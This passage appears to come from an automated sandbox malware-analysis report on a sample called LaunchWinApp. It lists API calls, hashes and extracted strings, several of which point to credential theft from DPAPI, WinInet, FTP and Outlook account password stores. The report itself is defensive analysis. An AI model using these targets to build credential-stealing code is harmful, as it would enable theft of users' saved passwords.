                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 4e5be989dd5d5ebc8b3721722ec6743cef7220c62adb7c5e36183d1321204e8f
                    • Instruction ID: 3834f5d0b0fa7ee222214c8c475d08e4aee319eee5858bf4e43ec97f72696992
                    • Opcode Fuzzy Hash: 4e5be989dd5d5ebc8b3721722ec6743cef7220c62adb7c5e36183d1321204e8f
                    • Instruction Fuzzy Hash: 69316D71600B01AFDB30AA39DA45B5BB3E5BB00355F10441FE499A7291EFB8AC458B2D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 00428AD8
                    • lstrlenW.KERNEL32(?,?,?,?), ref: 00428AF2
                    • lstrlenW.KERNEL32(?,?,?,?,?), ref: 00428AFF
                    • StrCmpNW.SHLWAPI(?,DPAPI: ,00000007,?,?,?,?), ref: 00428B19
                    • StrCmpNW.SHLWAPI(?,Microsoft_WinInet_,00000012,?,DPAPI: ,00000007,?,?,?,?), ref: 00428B2A
                    • StrCmpNW.SHLWAPI(?,ftp://,00000006,?,Microsoft_WinInet_,00000012,?,DPAPI: ,00000007,?,?,?,?), ref: 00428B3B
                    • lstrlenW.KERNEL32(?,?,ftp://,00000006,?,Microsoft_WinInet_,00000012,?,DPAPI: ,00000007,?,?,?,?), ref: 00428B72
                    • lstrlenW.KERNEL32(?,?,?,ftp://,00000006,?,Microsoft_WinInet_,00000012,?,DPAPI: ,00000007,?,?,?,?), ref: 00428BA5
                      • Part of subcall function 00414A6F: __EH_prolog.LIBCMT ref: 00414A74
                      • Part of subcall function 0041162F: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041165D
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$H_prolog$Ios_base_dtorstd::ios_base::_
                    • String ID: DPAPI: $Microsoft_WinInet_$ftp://
                    • API String ID: 3832056751-2984799227
                    • Opcode ID: f41ecbfb8deb7e4d213aff8f03352e40e411e805436b79b598662ee94e26cd8c
                    • Instruction ID: 3e0ced048a17677fa27a222bd2aa08f95f493865f3012197990d41e14c5bec3b
                    • Opcode Fuzzy Hash: f41ecbfb8deb7e4d213aff8f03352e40e411e805436b79b598662ee94e26cd8c
                    • Instruction Fuzzy Hash: 48413B30E01354ABCF11EBA5C891BEFBBB55F65384F00909EE40877282DE785E49C769
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00434D5D: lstrlenW.KERNEL32(?,?,004356F4), ref: 00434D81
                      • Part of subcall function 00434D5D: lstrcpyW.KERNEL32 ref: 00434D98
                      • Part of subcall function 00434D5D: CoTaskMemFree.OLE32(?,?,004356F4), ref: 00434DA1
                    • lstrcmpiW.KERNEL32(00000000,identification,00000000), ref: 0043570C
                    • lstrcmpiW.KERNEL32(?,identitymgr), ref: 0043571A
                    • lstrcmpiW.KERNEL32(00000000,inetcomm server passwords), ref: 0043573A
                    • lstrcmpiW.KERNEL32(00000000,outlook account manager passwords), ref: 00435746
                    • lstrcmpiW.KERNEL32(00000000,identities), ref: 00435752
                    • CoTaskMemFree.OLE32(?), ref: 00435788
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcmpi$FreeTask$lstrcpylstrlen
                    • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                    • API String ID: 1606502731-4287852900
                    • Opcode ID: d77016dde1f81b24b128d365a456b7c38c16db4a1dd5427be3f90dd16a711d19
                    • Instruction ID: ced5bba8cab1a304d55652142e9c1d109c4f6eea1a341f7004e042a636eec8e9
                    • Opcode Fuzzy Hash: d77016dde1f81b24b128d365a456b7c38c16db4a1dd5427be3f90dd16a711d19
                    • Instruction Fuzzy Hash: 4B31B17150060AFBCF119F96CC85DEF7B79EF48754F10805AF814A2250EB78DA10DBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: f5da1141bc23ae6a72398964912063c277e302b1af23eeb856e3ba50769a06ad
                    • Instruction ID: 13ece94f853496b0ca271b1e92e015819b6c0a8f5d53172d9939d9328856b51e
                    • Opcode Fuzzy Hash: f5da1141bc23ae6a72398964912063c277e302b1af23eeb856e3ba50769a06ad
                    • Instruction Fuzzy Hash: 1CC15571D40604AFDB20DBA9CC82FEE77F8AB08705F14405AFE45FB283E974AA458759
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3907804496
                    • Opcode ID: 7c5b6e03c11ead6cdf74588bcee31b8301e9cf250004adc05a0fef28c6a8b3ec
                    • Instruction ID: d880c2e215e932c2ba28ee53f4aa464a33f2bc002b0cdf142bf165d7395af2f8
                    • Opcode Fuzzy Hash: 7c5b6e03c11ead6cdf74588bcee31b8301e9cf250004adc05a0fef28c6a8b3ec
                    • Instruction Fuzzy Hash: C4C1E070E04245DBEF11DF99D880BAEBBB0BF49305F04405AE814AB393C7789D49CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0042A2FF
                      • Part of subcall function 00413E27: _Deallocate.LIBCONCRT ref: 00413E3C
                      • Part of subcall function 0040C5A5: __EH_prolog.LIBCMT ref: 0040C5AA
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeallocateH_prolog
                    • String ID: "\$,rh$.HAVCOGB$;?':$@$@Z$^$uo5i$~x+
                    • API String ID: 3708980276-3082752831
                    • Opcode ID: dab3d80705238747b671890d486e89c95756e3909bd82a935f83ad624634f2d7
                    • Instruction ID: f0c44152d83ce61fef9ef4032a72f44cb9ad9ecdbe5204f1a742bf07efdaa25d
                    • Opcode Fuzzy Hash: dab3d80705238747b671890d486e89c95756e3909bd82a935f83ad624634f2d7
                    • Instruction Fuzzy Hash: 8FD10430D04298CBDF15EFA5D491ADDFB70AF59308F50809ED44677242EF784A89CB6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0046497C: CreateFileW.KERNEL32(00000000,?,?,lMF,?,?,00000000,?,00464D6C,00000000,0000000C), ref: 00464999
                    • GetLastError.KERNEL32 ref: 00464DD7
                    • __dosmaperr.LIBCMT ref: 00464DDE
                    • GetFileType.KERNEL32(00000000), ref: 00464DEA
                    • GetLastError.KERNEL32 ref: 00464DF4
                    • __dosmaperr.LIBCMT ref: 00464DFD
                    • CloseHandle.KERNEL32(00000000), ref: 00464E1D
                    • CloseHandle.KERNEL32(0045B393), ref: 00464F6A
                    • GetLastError.KERNEL32 ref: 00464F9C
                    • __dosmaperr.LIBCMT ref: 00464FA3
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: 900f5f4d0f2604750fa8dba6298f7beccef75067213b995915caa8319bee0f25
                    • Instruction ID: b1e33752c527ffc13438350d42aa46bdec670cb950b4e4acb1575bb091a95199
                    • Opcode Fuzzy Hash: 900f5f4d0f2604750fa8dba6298f7beccef75067213b995915caa8319bee0f25
                    • Instruction Fuzzy Hash: 8AA13832A001549FDF19EF68DC91BAE7BE0AB46324F18015EF811AB3D1E7398D16C75A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _strcat.LIBCMT ref: 0041F104
                    • wsprintfA.USER32 ref: 0041F15E
                    • wsprintfA.USER32 ref: 0041F17F
                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 0041F1AE
                    • WriteFile.KERNEL32(?,?,00000000,000000FF,00000000), ref: 0041F220
                    • SetFileTime.KERNEL32(?,?,?,?), ref: 0041F25A
                    • CloseHandle.KERNEL32(?), ref: 0041F26A
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$wsprintf$CloseCreateHandleTimeWrite_strcat
                    • String ID: %s%s$%s%s%s$:
                    • API String ID: 840165387-3034790606
                    • Opcode ID: 3cec4ebec5dbd04e64b5bb141e66d3ad2bcb8e4857bf8e77776952cf148ea20f
                    • Instruction ID: 449276029ece4150a2aa6485bb31e868b4af0334c182ee7cf899543bca6bd2de
                    • Opcode Fuzzy Hash: 3cec4ebec5dbd04e64b5bb141e66d3ad2bcb8e4857bf8e77776952cf148ea20f
                    • Instruction Fuzzy Hash: 87615C34604304EBCB21CF65C884BEA77A9AF09314F1045BFE99597292D7799ECBCB09
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 0043E202
                    • GetFileSize.KERNEL32(?,00000000,?,?), ref: 0043E282
                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0043E299
                    • ReadFile.KERNEL32(?,?,00000002,?,00000000,?,?), ref: 0043E2AC
                    • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?), ref: 0043E2B9
                    • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?), ref: 0043E2CC
                    • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?), ref: 0043E2ED
                    • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?), ref: 0043E300
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$PointerRead$HandleInformationSize
                    • String ID:
                    • API String ID: 2979504256-0
                    • Opcode ID: 4b2845aadeeeedebf06746345ee509e2f5e685ba4367de85b3e2a1f1b4d16cc8
                    • Instruction ID: c004d36ebe18715a8d63a9f7715695fab7ee137f541bfec39d04e404a1261500
                    • Opcode Fuzzy Hash: 4b2845aadeeeedebf06746345ee509e2f5e685ba4367de85b3e2a1f1b4d16cc8
                    • Instruction Fuzzy Hash: 8B5181B5A01208BBEB24DFA9CC81BBF77F9EB48700F50482AF902E7281D674DD018B55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 0044418F
                    • type_info::operator==.LIBVCRUNTIME ref: 004441B1
                    • ___TypeMatch.LIBVCRUNTIME ref: 004442C0
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 00444392
                    • _UnwindNestedFrames.LIBCMT ref: 00444416
                    • CallUnexpected.LIBVCRUNTIME ref: 00444431
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 2123188842-393685449
                    • Opcode ID: ee865eaa281affe4f268f99035dd77553895f7ebdd44fba665c3bbb780033484
                    • Instruction ID: 76ee06ea629b502b81153e23b71d333b71dab2dd5e026666655c057760d3b435
                    • Opcode Fuzzy Hash: ee865eaa281affe4f268f99035dd77553895f7ebdd44fba665c3bbb780033484
                    • Instruction Fuzzy Hash: D3B1AA71900209EFEF28DFA5C881AAFB7B5BF94715F10415BE8106B202D738DE61CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 00429B68
                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000), ref: 00429C73
                    • CloseHandle.KERNEL32(00000000), ref: 00429C81
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00429CC8
                    • ReadFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00429CF4
                    • CloseHandle.KERNEL32(00000000), ref: 00429CFB
                      • Part of subcall function 0040C9FC: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,00000000,?,?,?,?,00000000), ref: 0040CA0F
                      • Part of subcall function 0040C9FC: DeleteFileTransactedA.KERNEL32 ref: 0040CA26
                      • Part of subcall function 0040C9FC: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000), ref: 0040CA31
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
                    • String ID: 04<$Sbpptlqg$z4/66
                    • API String ID: 604483397-2878691601
                    • Opcode ID: 9d0126fe3125f1e40f3e7f1515986ed793b71aeea603032461edbd4335264fa4
                    • Instruction ID: 7270e65da639a491c837f879b511a321b676181613d6871b48502c6b88c3ccfc
                    • Opcode Fuzzy Hash: 9d0126fe3125f1e40f3e7f1515986ed793b71aeea603032461edbd4335264fa4
                    • Instruction Fuzzy Hash: 5E91E130D042589EDF11DBF9D841BEEBBB4AF59304F10809EE45577282DB781B4ACB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0042A783
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeallocateH_prolog
                    • String ID: '$0->8$:$=$8V$Klwj$Y~ex$]DX6$kmo
                    • API String ID: 3708980276-3465840843
                    • Opcode ID: af55d83b93bdacff8014611a54a710a857089bed1f9ac4ecb08a7bad63cf0beb
                    • Instruction ID: 1cf167f678627b7213b3a62165abed2a57a19da4e783b6cdaddb0d5db459ed6b
                    • Opcode Fuzzy Hash: af55d83b93bdacff8014611a54a710a857089bed1f9ac4ecb08a7bad63cf0beb
                    • Instruction Fuzzy Hash: 0C917B70C0129CDADB05DFE9DA915ECFBB0BF69308F5042AEE84537252EB741A89CB15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,?,0045F086), ref: 00466B87
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: \1A$acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-1101550966
                    • Opcode ID: d0c298cba08006ba937b6424f7533d63f9b2ab4fd3a1aedea680d41921746692
                    • Instruction ID: 277b25c4dbea6740caf710ce7d53f049e1750238b42549c296507d80a2be4eb3
                    • Opcode Fuzzy Hash: d0c298cba08006ba937b6424f7533d63f9b2ab4fd3a1aedea680d41921746692
                    • Instruction Fuzzy Hash: 53517CB090091ACBDF109F59D9481AEBFB4FB05300F168057E490A6364E77C8A69DF5F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0043534E
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00435379
                    • lstrlenW.KERNEL32(?), ref: 00435390
                    • lstrlenW.KERNEL32(?), ref: 0043539D
                    • lstrcpyW.KERNEL32 ref: 004353BE
                    • lstrcatW.KERNEL32(00000000,0047E440), ref: 004353CA
                    • lstrcatW.KERNEL32(00000000,?), ref: 004353D8
                    • lstrcatW.KERNEL32(00000000,?), ref: 004353E4
                    • RegEnumKeyExW.ADVAPI32(?,?,?,000007FF,00000000,00000000,00000000,00000000), ref: 0043541E
                    • RegCloseKey.ADVAPI32(?), ref: 00435433
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Enumlstrlen$CloseOpenlstrcpy
                    • String ID:
                    • API String ID: 3646165539-0
                    • Opcode ID: b32a93a648a20521435bfa43436669ae1f9e328a6dc734ab387af6766ccd9f74
                    • Instruction ID: 37c10a812fbd51a447f430363fe97f453b6509787c7c017df0af4a1042ebcf1c
                    • Opcode Fuzzy Hash: b32a93a648a20521435bfa43436669ae1f9e328a6dc734ab387af6766ccd9f74
                    • Instruction Fuzzy Hash: F1317375500119BFEB109B92DC88EFF7BBCEF85755F00006AF805E2110EBB89E41EA65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _free.LIBCMT ref: 0045A0CD
                      • Part of subcall function 0045813E: HeapFree.KERNEL32(00000000,00000000,?,00461F3E,?,00000000,?,00000002,?,004621E1,?,00000007,?,?,004625E2,?), ref: 00458154
                      • Part of subcall function 0045813E: GetLastError.KERNEL32(?,?,00461F3E,?,00000000,?,00000002,?,004621E1,?,00000007,?,?,004625E2,?,?), ref: 00458166
                    • _free.LIBCMT ref: 0045A0D9
                    • _free.LIBCMT ref: 0045A0E4
                    • _free.LIBCMT ref: 0045A0EF
                    • _free.LIBCMT ref: 0045A0FA
                    • _free.LIBCMT ref: 0045A105
                    • _free.LIBCMT ref: 0045A110
                    • _free.LIBCMT ref: 0045A11B
                    • _free.LIBCMT ref: 0045A126
                    • _free.LIBCMT ref: 0045A134
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 3ceed48b4a17cbcdde70031d615c3461e9b2d8f4e2beddfa82eed1d2ee5458ab
                    • Instruction ID: b02fa920f452a0edfe744891049f39be5e49c13881d295e03a618375052dc715
                    • Opcode Fuzzy Hash: 3ceed48b4a17cbcdde70031d615c3461e9b2d8f4e2beddfa82eed1d2ee5458ab
                    • Instruction Fuzzy Hash: 7421BB76900108AFCB11EF95C841DDE7BB5FF08345F4041AAB955AB622DF35DA498B84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 00443B97
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00443B9F
                    • _ValidateLocalCookies.LIBCMT ref: 00443C28
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00443C53
                    • _ValidateLocalCookies.LIBCMT ref: 00443CA8
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: \1A$csm$j&D
                    • API String ID: 1170836740-224734935
                    • Opcode ID: 8800b70512f566a6ed731b46be6f5d81cca9cac57c238c8d97061eef242c7d0e
                    • Instruction ID: d51ed6bd50955f7606e1d4a61f7f962d3041dcf4edb3d25ec6ad6015a4d554b9
                    • Opcode Fuzzy Hash: 8800b70512f566a6ed731b46be6f5d81cca9cac57c238c8d97061eef242c7d0e
                    • Instruction Fuzzy Hash: 44413835A002489BDF10DF69C884B9EBBB1FF45718F20805BE8146B392D739EB05CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strlen
                    • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                    • API String ID: 4218353326-51310709
                    • Opcode ID: 2b6cba59c9eb04cec2d0f1339764d9a3b986a62fb1733c0560ba57fad7fa7ea9
                    • Instruction ID: cbec075873f3744001ad92d190fb4b735827c992066215d9f43ee809ff3f44c0
                    • Opcode Fuzzy Hash: 2b6cba59c9eb04cec2d0f1339764d9a3b986a62fb1733c0560ba57fad7fa7ea9
                    • Instruction Fuzzy Hash: C111563624EF23347D29312B6D4669B07C88D2F775B34555FF804651C3EEAC989740AE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: bdd40f47e034e4493e106712339f187f54a9f229e7637175c413f22ef96c2ed3
                    • Instruction ID: a12750872b32ba96601a1010e6a302b757b4c009f38bb5e8bec1fcfd3b4263ea
                    • Opcode Fuzzy Hash: bdd40f47e034e4493e106712339f187f54a9f229e7637175c413f22ef96c2ed3
                    • Instruction Fuzzy Hash: D361F171900704AFDB20DF65C841BABB7E9AB44710F14442FEC95AB292EF39ED058B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0045A1CF: GetLastError.KERNEL32(?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0045A1D4
                      • Part of subcall function 0045A1CF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000), ref: 0045A272
                    • _free.LIBCMT ref: 00456907
                    • _free.LIBCMT ref: 00456920
                    • _free.LIBCMT ref: 0045695E
                    • _free.LIBCMT ref: 00456967
                    • _free.LIBCMT ref: 00456973
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorLast
                    • String ID: C$\1A
                    • API String ID: 3291180501-1409371277
                    • Opcode ID: 19fa5effae3c9c8c69609a08b37176d08fc8ebdf5e7572223989f41d2fa92409
                    • Instruction ID: 848bc5e06223e7e0905d1580e1030fe6fc191d66266b0846560d3ae1ab0cac43
                    • Opcode Fuzzy Hash: 19fa5effae3c9c8c69609a08b37176d08fc8ebdf5e7572223989f41d2fa92409
                    • Instruction Fuzzy Hash: 8EB18D75A012199FDB24DF18C884AAEB3B5FF08305F9145AEE849A7351DB34AE94CF48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 004408E8
                    • __alloca_probe_16.LIBCMT ref: 00440914
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00440953
                    • LCMapStringEx.KERNEL32 ref: 00440970
                    • LCMapStringEx.KERNEL32 ref: 004409AF
                    • __alloca_probe_16.LIBCMT ref: 004409CC
                    • LCMapStringEx.KERNEL32 ref: 00440A0E
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00440A31
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                    • String ID:
                    • API String ID: 2040435927-0
                    • Opcode ID: 7218ec8fec4a1f2a53c0e1afa371e996143bf8f1c0799ab02678c9fb0097ae49
                    • Instruction ID: bfdb2df5cd27e07213f8f249946cd62750bb239cc9ae1030bd6de8903d31f029
                    • Opcode Fuzzy Hash: 7218ec8fec4a1f2a53c0e1afa371e996143bf8f1c0799ab02678c9fb0097ae49
                    • Instruction Fuzzy Hash: 3151C172600216AFFB209F61CC45FAB7BA9EF54740F14442AFA14E6250DB78DC21DBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00464653,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0046443A
                    • __alloca_probe_16.LIBCMT ref: 004644F0
                    • __alloca_probe_16.LIBCMT ref: 00464586
                    • __freea.LIBCMT ref: 004645F1
                    • __freea.LIBCMT ref: 004645FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alloca_probe_16__freea$Info
                    • String ID: SFF
                    • API String ID: 2330168043-2821146077
                    • Opcode ID: 1daf6741d44b6238d6f2614582c158962393b7d052f20e3f9bbd12f7033059b5
                    • Instruction ID: 5c548b7d9f34db811a1beae4d87a1367021e28c5b0fd8aa32a7ba93911d6a76d
                    • Opcode Fuzzy Hash: 1daf6741d44b6238d6f2614582c158962393b7d052f20e3f9bbd12f7033059b5
                    • Instruction Fuzzy Hash: 2281E471D00215ABDF209E55C842AEF7BB59F8A754F18005BE901A7341FB3DCD45CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetFileAttributesExW.KERNEL32(?,00000000,?,?,?), ref: 0043FA6A
                    • GetLastError.KERNEL32(?,?), ref: 0043FA74
                    • ___std_fs_open_handle@16.LIBCPMT ref: 0043FAD4
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesErrorFileLast___std_fs_open_handle@16
                    • String ID:
                    • API String ID: 617199260-0
                    • Opcode ID: 6a587641a0f30b15f70b91486dcd868c3f9ea6d0c8112f273860fff1a8c7a69b
                    • Instruction ID: 10b9febb2cc8fc5c9e8fc0b4f598d9c41d4639d4974abf7498fd9f554ea64f81
                    • Opcode Fuzzy Hash: 6a587641a0f30b15f70b91486dcd868c3f9ea6d0c8112f273860fff1a8c7a69b
                    • Instruction Fuzzy Hash: 6C61B2B1E007059BDB14CF68C851BAAB7B4BF08314F14563AEC64DB381E774E915CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0045A421: RtlAllocateHeap.NTDLL(00000000,0043FE4F,00000000,?,00441C9B,00000002,00000000,?,tI3iZ,?,0040A956,0043FE4F,00000004,00000000,00000000,00000000), ref: 0045A453
                    • _free.LIBCMT ref: 004562A0
                    • _free.LIBCMT ref: 004562B7
                    • _free.LIBCMT ref: 004562D4
                    • _free.LIBCMT ref: 004562EF
